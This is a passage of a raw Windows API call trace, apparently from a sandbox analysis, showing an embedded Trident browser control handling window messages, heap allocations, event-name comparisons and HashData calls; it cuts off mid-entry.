(in: hWnd=0x103e0, lpRect=0x19a17c | out: lpRect=0x19a17c) returned 1 [0181.108] OffsetRect (in: lprc=0xd0c5ac, dx=0, dy=0 | out: lprc=0xd0c5ac) returned 1 [0181.108] CopyRect (in: lprcDst=0xd0c5bc, lprcSrc=0x19a17c | out: lprcDst=0xd0c5bc) returned 1 [0181.108] OffsetRect (in: lprc=0xd0c5bc, dx=0, dy=0 | out: lprc=0xd0c5bc) returned 1 [0181.108] CopyRect (in: lprcDst=0x19a05c, lprcSrc=0x19a17c | out: lprcDst=0x19a05c) returned 1 [0181.108] IntersectRect (in: lprcDst=0x19a06c, lprcSrc1=0x19a05c, lprcSrc2=0x19a17c | out: lprcDst=0x19a06c) returned 1 [0181.109] EqualRect (lprc1=0x19a06c, lprc2=0x19a05c) returned 1 [0181.109] CreateRectRgnIndirect (lprect=0x6d72c540) returned 0x1e040a78 [0181.109] GetUpdateRgn (hWnd=0x103e2, hRgn=0x1e040a78, bErase=0) returned 1 [0181.109] DeleteObject (ho=0x1e040a78) returned 1 [0181.109] SetWindowPos (hWnd=0x103e2, hWndInsertAfter=0x0, X=0, Y=0, cx=442, cy=256, uFlags=0x14) returned 1 [0181.109] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0181.109] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x46, wParam=0x0, lParam=0x19a004*=66530, plResult=0x199e60 | out: plResult=0x199e60) returned 0x1 [0181.109] NtdllDefWindowProc_W () returned 0x0 [0181.109] GetCurrentThreadId () returned 0xb48 [0181.110] GetCurrentThreadId () returned 0xb48 [0181.112] NtdllDefWindowProc_W () returned 0x0 [0181.113] NtdllDefWindowProc_W () returned 0x0 [0181.121] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0181.121] IUnknown_GetWindow (in: punk=0x0, phwnd=0x19a188 | out: phwnd=0x19a188) returned 0x80004005 [0181.121] NtdllDefWindowProc_W () returned 0x1 [0181.124] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0181.126] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0181.127] GetWindowLongW (hWnd=0x103bc, nIndex=-21) returned 6297072 [0181.127] NtdllDefWindowProc_W () returned 0x0 [0181.127] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0181.127] NtdllDefWindowProc_W () returned 0x0 [0181.128] NtdllDefWindowProc_W () returned 0x0 [0181.128] NtdllDefWindowProc_W () returned 0x0 [0181.128] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0181.128] GetAncestor (hwnd=0x103e2, gaFlags=0x3) returned 0x4031a [0181.128] GetAncestor (hwnd=0x0, gaFlags=0x3) returned 0x0 [0181.128] IsChild (hWndParent=0x103e2, hWnd=0x0) returned 0 [0181.129] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199ee8 | out: lpPoint=0x199ee8) returned 1 [0181.129] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199ba8 | out: lpPoint=0x199ba8) returned 1 [0181.129] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199ba8 | out: lpPoint=0x199ba8) returned 1 [0181.130] PostMessageW (hWnd=0x30316, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0181.130] GetMessageTime () returned 30897890 [0181.130] GetMessagePos () returned 0x11e01d6 [0181.138] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x8, wParam=0x0, lParam=0x0, plResult=0x199ddc | out: plResult=0x199ddc) returned 0x1 [0181.138] NtdllDefWindowProc_W () returned 0x0 [0181.138] GetCurrentThreadId () returned 0xb48 [0181.139] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0181.139] GetMessageTime () returned 30897890 [0181.139] GetMessagePos () returned 0x11e01d6 [0181.139] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x199ad4 | out: plResult=0x199ad4) returned 0x0 [0181.139] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0181.139] GetMessageTime () returned 30897890 [0181.140] GetMessagePos () returned 0x11e01d6 [0181.140] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.140] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.140] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.140] memcpy_s (in: _Destination=0xd9ad80, _DestinationSize=0x118, _Source=0xd9ac60, _SourceSize=0x118 | out: _Destination=0xd9ad80) returned 0x0 [0181.140] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dcea0 [0181.140] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.141] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0181.141] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0181.141] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0181.141] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0181.141] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0181.141] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0181.141] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0181.141] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0181.141] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0181.141] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0181.141] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0181.141] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0181.141] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0181.141] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0181.142] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcea0 | out: hHeap=0x5e0000) returned 1 [0181.142] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.142] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.142] memcpy_s (in: _Destination=0xd9aea0, _DestinationSize=0x118, _Source=0xd9ac60, _SourceSize=0x118 | out: _Destination=0xd9aea0) returned 0x0 [0181.142] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dcd60 [0181.142] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.142] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0181.142] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0181.143] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0181.143] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0181.143] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0181.143] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0181.143] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0181.143] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0181.143] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0181.143] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0181.143] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0181.143] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0181.143] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0181.143] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0181.143] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0181.143] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0181.143] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0181.143] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0181.143] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0181.143] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0181.143] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0181.143] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0181.143] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0181.144] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0181.144] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0181.144] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0181.144] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0181.144] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0181.144] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.144] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcd60 | out: hHeap=0x5e0000) returned 1 [0181.145] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x282, wParam=0x1, lParam=0x0, plResult=0x199394 | out: plResult=0x199394) returned 0x0 [0181.145] GetCurrentThreadId () returned 0xb48 [0181.145] GetCurrentThreadId () returned 0xb48 [0181.145] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3099996417325) returned 1 [0181.145] NtdllDefWindowProc_W () returned 0x0 [0181.146] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0181.146] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0181.146] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0181.146] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0181.146] GetAncestor (hwnd=0x103e2, gaFlags=0x2) returned 0x103e0 [0181.146] IsIconic (hWnd=0x103e0) returned 0 [0181.146] GetCurrentThreadId () returned 0xb48 [0181.146] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0181.150] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0181.150] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0181.151] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a8 | out: lpPoint=0x19a1a8) returned 1 [0181.151] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.151] GetCurrentThreadId () returned 0xb48 [0181.152] GetCurrentThreadId () returned 0xb48 [0181.152] GetFocus () returned 0x0 [0181.152] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19a197) returned 0 [0181.152] GetCurrentThreadId () returned 0xb48 [0181.152] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3099997120579) returned 1 [0181.152] GetCurrentThreadId () returned 0xb48 [0181.152] GetCurrentThreadId () returned 0xb48 [0181.152] GetCurrentThreadId () returned 0xb48 [0181.153] QueryPerformanceCounter (in: lpPerformanceCount=0x19a1d8 | out: lpPerformanceCount=0x19a1d8*=3099997165577) returned 1 [0181.153] QueryPerformanceCounter (in: lpPerformanceCount=0x19a1a8 | out: lpPerformanceCount=0x19a1a8*=3099997172770) returned 1 [0181.153] QueryPerformanceCounter (in: lpPerformanceCount=0x19a12c | out: lpPerformanceCount=0x19a12c*=3099997190770) returned 1 [0181.153] QueryPerformanceCounter (in: lpPerformanceCount=0x19a118 | out: lpPerformanceCount=0x19a118*=3099997198394) returned 1 [0181.153] QueryPerformanceCounter (in: lpPerformanceCount=0x19a0bc | out: lpPerformanceCount=0x19a0bc*=3099997205312) returned 1 [0181.153] GetClientRect (in: hWnd=0x103e2, lpRect=0x19a240 | out: lpRect=0x19a240) returned 1 [0181.154] QueryPerformanceCounter (in: lpPerformanceCount=0x19a314 | out: lpPerformanceCount=0x19a314*=3099997267757) returned 1 [0181.154] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0181.154] GetFocus () returned 0x0 [0181.155] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19a21f) returned 0 [0181.155] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.155] GetClientRect (in: hWnd=0x103e2, lpRect=0xcfcfe4 | out: lpRect=0xcfcfe4) returned 1 [0181.155] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.155] QueryPerformanceCounter (in: lpPerformanceCount=0x199dd8 | out: lpPerformanceCount=0x199dd8*=3099997447038) returned 1 [0181.156] GetDCEx (hWnd=0x103e2, hrgnClip=0x0, flags=0x12) returned 0xb010541 [0181.156] CreateRectRgnIndirect (lprect=0x199d78) returned 0x1f040a78 [0181.156] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199db8, cPoints=0x1 | out: lpPoints=0x199db8) returned 21823995 [0181.156] GetRandomRgn (hdc=0xb010541, hrgn=0x1f040a78, i=4) returned 1 [0181.156] OffsetRgn (hrgn=0x1f040a78, x=-507, y=-333) returned 2 [0181.156] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199dc8, cPoints=0x1 | out: lpPoints=0x199dc8) returned 21823995 [0181.156] GetRegionData (in: hrgn=0x1f040a78, nCount=0x0, lpRgnData=0x0 | out: lpRgnData=0x0) returned 0x30 [0181.156] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c460 [0181.156] GetRegionData (in: hrgn=0x1f040a78, nCount=0x30, lpRgnData=0x9f6c460 | out: lpRgnData=0x9f6c460) returned 0x30 [0181.156] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.157] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c460 | out: hHeap=0x5e0000) returned 1 [0181.157] DeleteObject (ho=0x1f040a78) returned 1 [0181.157] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c150 [0181.157] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x9f6c150) returned 0x94040a6c [0181.157] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c150 | out: hHeap=0x5e0000) returned 1 [0181.157] SelectClipRgn (hdc=0xb010541, hrgn=0x94040a6c) returned 2 [0181.157] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c1c0 [0181.157] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x9f6c1c0) returned 0x2b040a81 [0181.157] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c1c0 | out: hHeap=0x5e0000) returned 1 [0181.157] ValidateRgn (hWnd=0x103e2, hRgn=0x2b040a81) returned 1 [0181.157] DeleteObject (ho=0x94040a6c) returned 1 [0181.157] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.158] GetClientRect (in: hWnd=0x103e2, lpRect=0x199cd0 | out: lpRect=0x199cd0) returned 1 [0181.159] GetSysColor (nIndex=15) returned 0xf0f0f0 [0181.161] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x7c) returned 0x68bd28 [0181.161] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f98 [0181.161] HashData (in: pbData=0x9f82f98, cbData=0x1, pbHash=0x198c48, cbHash=0x2 | out: pbHash=0x198c48) returned 0x0 [0181.161] HashData (in: pbData=0x198c44, cbData=0x4, pbHash=0x198c50, cbHash=0x2 | out: pbHash=0x198c50) returned 0x0 [0181.161] HashData (in: pbData=0x9f82f9c, cbData=0xc, pbHash=0x198c4c, cbHash=0x2 | out: pbHash=0x198c4c) returned 0x0 [0181.162] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f98 | out: hHeap=0x5e0000) returned 1 [0181.162] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ed8 [0181.162] HashData (in: pbData=0x9f82ed8, cbData=0x1, pbHash=0x198c48, cbHash=0x2 | out: pbHash=0x198c48) returned 0x0 [0181.162] HashData (in: pbData=0x198c44, cbData=0x4, pbHash=0x198c50, cbHash=0x2 | out: pbHash=0x198c50) returned 0x0 [0181.162] HashData (in: pbData=0x9f82edc, cbData=0xc, pbHash=0x198c4c, cbHash=0x2 | out: pbHash=0x198c4c) returned 0x0 [0181.162] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ed8 | out: hHeap=0x5e0000) returned 1 [0181.162] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f80 [0181.162] HashData (in: pbData=0x9f82f80, cbData=0x1, pbHash=0x198c48, cbHash=0x2 | out: pbHash=0x198c48) returned 0x0 [0181.162] HashData (in: pbData=0x198c44, cbData=0x4, pbHash=0x198c50, cbHash=0x2 | out: pbHash=0x198c50) returned 0x0 [0181.162] HashData (in: pbData=0x9f82f84, cbData=0xc, pbHash=0x198c4c, cbHash=0x2 | out: pbHash=0x198c4c) returned 0x0 [0181.162] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f80 | out: hHeap=0x5e0000) returned 1 [0181.162] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83040 [0181.162] HashData (in: pbData=0x9f83040, cbData=0x1, pbHash=0x198c48, cbHash=0x2 | out: pbHash=0x198c48) returned 0x0 [0181.162] HashData (in: pbData=0x198c44, cbData=0x4, pbHash=0x198c50, cbHash=0x2 | out: pbHash=0x198c50) returned 0x0 [0181.173] HashData (in: pbData=0x9f83044, cbData=0xc, pbHash=0x198c4c, cbHash=0x2 | out: pbHash=0x198c4c) returned 0x0 [0181.173] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83040 | out: hHeap=0x5e0000) returned 1 [0181.173] GetSysColor (nIndex=15) returned 0xf0f0f0 [0181.174] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fe0 [0181.174] HashData (in: pbData=0x9f82fe0, cbData=0x1, pbHash=0x198c48, cbHash=0x2 | out: pbHash=0x198c48) returned 0x0 [0181.174] HashData (in: pbData=0x198c44, cbData=0x4, pbHash=0x198c50, cbHash=0x2 | out: pbHash=0x198c50) returned 0x0 [0181.174] HashData (in: pbData=0x9f82fe4, cbData=0xc, pbHash=0x198c4c, cbHash=0x2 | out: pbHash=0x198c4c) returned 0x0 [0181.174] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fe0 | out: hHeap=0x5e0000) returned 1 [0181.175] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83190 [0181.175] HashData (in: pbData=0x9f83190, cbData=0x1, pbHash=0x198c48, cbHash=0x2 | out: pbHash=0x198c48) returned 0x0 [0181.175] HashData (in: pbData=0x198c44, cbData=0x4, pbHash=0x198c50, cbHash=0x2 | out: pbHash=0x198c50) returned 0x0 [0181.175] HashData (in: pbData=0x9f83194, cbData=0xc, pbHash=0x198c4c, cbHash=0x2 | out: pbHash=0x198c4c) returned 0x0 [0181.175] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83190 | out: hHeap=0x5e0000) returned 1 [0181.175] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83100 [0181.175] HashData (in: pbData=0x9f83100, cbData=0x1, pbHash=0x198560, cbHash=0x2 | out: pbHash=0x198560) returned 0x0 [0181.175] HashData (in: pbData=0x19855c, cbData=0x4, pbHash=0x198568, cbHash=0x2 | out: pbHash=0x198568) returned 0x0 [0181.175] HashData (in: pbData=0x9f83104, cbData=0xc, pbHash=0x198564, cbHash=0x2 | out: pbHash=0x198564) returned 0x0 [0181.175] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83100 | out: hHeap=0x5e0000) returned 1 [0181.175] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fb0 [0181.175] HashData (in: pbData=0x9f82fb0, cbData=0x1, pbHash=0x198560, cbHash=0x2 | out: pbHash=0x198560) returned 0x0 [0181.175] HashData (in: pbData=0x19855c, cbData=0x4, pbHash=0x198568, cbHash=0x2 | out: pbHash=0x198568) returned 0x0 [0181.175] HashData (in: pbData=0x9f82fb4, cbData=0xc, pbHash=0x198564, cbHash=0x2 | out: pbHash=0x198564) returned 0x0 [0181.175] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fb0 | out: hHeap=0x5e0000) returned 1 [0181.175] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f98 [0181.176] HashData (in: pbData=0x9f82f98, cbData=0x1, pbHash=0x198560, cbHash=0x2 | out: pbHash=0x198560) returned 0x0 [0181.176] HashData (in: pbData=0x19855c, cbData=0x4, pbHash=0x198568, cbHash=0x2 | out: pbHash=0x198568) returned 0x0 [0181.176] HashData (in: pbData=0x9f82f9c, cbData=0xc, pbHash=0x198564, cbHash=0x2 | out: pbHash=0x198564) returned 0x0 [0181.176] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f98 | out: hHeap=0x5e0000) returned 1 [0181.176] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f20 [0181.176] HashData (in: pbData=0x9f82f20, cbData=0x1, pbHash=0x198560, cbHash=0x2 | out: pbHash=0x198560) returned 0x0 [0181.176] HashData (in: pbData=0x19855c, cbData=0x4, pbHash=0x198568, cbHash=0x2 | out: pbHash=0x198568) returned 0x0 [0181.176] HashData (in: pbData=0x9f82f24, cbData=0xc, pbHash=0x198564, cbHash=0x2 | out: pbHash=0x198564) returned 0x0 [0181.176] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f20 | out: hHeap=0x5e0000) returned 1 [0181.176] GetSysColor (nIndex=15) returned 0xf0f0f0 [0181.179] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ff8 [0181.180] HashData (in: pbData=0x9f82ff8, cbData=0x1, pbHash=0x198560, cbHash=0x2 | out: pbHash=0x198560) returned 0x0 [0181.180] HashData (in: pbData=0x19855c, cbData=0x4, pbHash=0x198568, cbHash=0x2 | out: pbHash=0x198568) returned 0x0 [0181.180] HashData (in: pbData=0x9f82ffc, cbData=0xc, pbHash=0x198564, cbHash=0x2 | out: pbHash=0x198564) returned 0x0 [0181.180] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ff8 | out: hHeap=0x5e0000) returned 1 [0181.180] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fe0 [0181.180] HashData (in: pbData=0x9f82fe0, cbData=0x1, pbHash=0x198560, cbHash=0x2 | out: pbHash=0x198560) returned 0x0 [0181.180] HashData (in: pbData=0x19855c, cbData=0x4, pbHash=0x198568, cbHash=0x2 | out: pbHash=0x198568) returned 0x0 [0181.180] HashData (in: pbData=0x9f82fe4, cbData=0xc, pbHash=0x198564, cbHash=0x2 | out: pbHash=0x198564) returned 0x0 [0181.180] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fe0 | out: hHeap=0x5e0000) returned 1 [0181.180] LsSetDoc () returned 0x0 [0181.180] LsCreateLine () returned 0x0 [0181.181] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.181] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.181] LsdnFinishRegular () returned 0x0 [0181.181] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.182] LsdnFinishRegular () returned 0x0 [0181.183] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.183] LsDisplayLine () returned 0x0 [0181.183] IOleInPlaceFrame:SetMenu (This=0xd90f00, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0181.183] IOleInPlaceFrame:SetMenu (This=0xd90ee0, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x0) returned 0x0 [0181.183] GetSysColor (nIndex=8) returned 0x0 [0181.183] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.183] GetSysColor (nIndex=8) returned 0x0 [0181.183] LsDestroyLine () returned 0x0 [0181.184] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0181.184] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ab0 [0181.184] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f831a8 [0181.184] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7a88 [0181.184] HashData (in: pbData=0x9f831ac, cbData=0x4, pbHash=0x9f831b0, cbHash=0x2 | out: pbHash=0x9f831b0) returned 0x0 [0181.185] HashData (in: pbData=0x6d7a88, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.185] HashData (in: pbData=0x6d7a8a, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.185] HashData (in: pbData=0x6d7a8c, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.185] HashData (in: pbData=0x6d7a94, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.185] HashData (in: pbData=0x6d7a9c, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.185] HashData (in: pbData=0x6d7aa4, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.185] HashData (in: pbData=0x6d7aa6, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.185] HashData (in: pbData=0x6d7aa8, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.185] HashData (in: pbData=0x6d7ab0, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.185] HashData (in: pbData=0x197bec, cbData=0x4, pbHash=0x197bd8, cbHash=0x2 | out: pbHash=0x197bd8) returned 0x0 [0181.185] HashData (in: pbData=0x6d7abc, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.185] HashData (in: pbData=0x6d7ac4, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.185] HashData (in: pbData=0x6d7ad0, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.185] HashData (in: pbData=0x6d7ad4, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.185] HashData (in: pbData=0x6d7adc, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.185] HashData (in: pbData=0x6d7ae8, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.186] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7a88 | out: hHeap=0x5e0000) returned 1 [0181.186] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f831a8 | out: hHeap=0x5e0000) returned 1 [0181.186] HashData (in: pbData=0x9ee6ab0, cbData=0x1, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0181.186] HashData (in: pbData=0x197bf4, cbData=0x4, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0181.186] HashData (in: pbData=0x9ee6ab4, cbData=0x4, pbHash=0x197bf8, cbHash=0x2 | out: pbHash=0x197bf8) returned 0x0 [0181.186] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ab0 | out: hHeap=0x5e0000) returned 1 [0181.186] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6b40 [0181.186] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830d0 [0181.186] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7e08 [0181.186] HashData (in: pbData=0x9f830d4, cbData=0x4, pbHash=0x9f830d8, cbHash=0x2 | out: pbHash=0x9f830d8) returned 0x0 [0181.187] HashData (in: pbData=0x6d7e08, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.187] HashData (in: pbData=0x6d7e0a, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.187] HashData (in: pbData=0x6d7e0c, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: 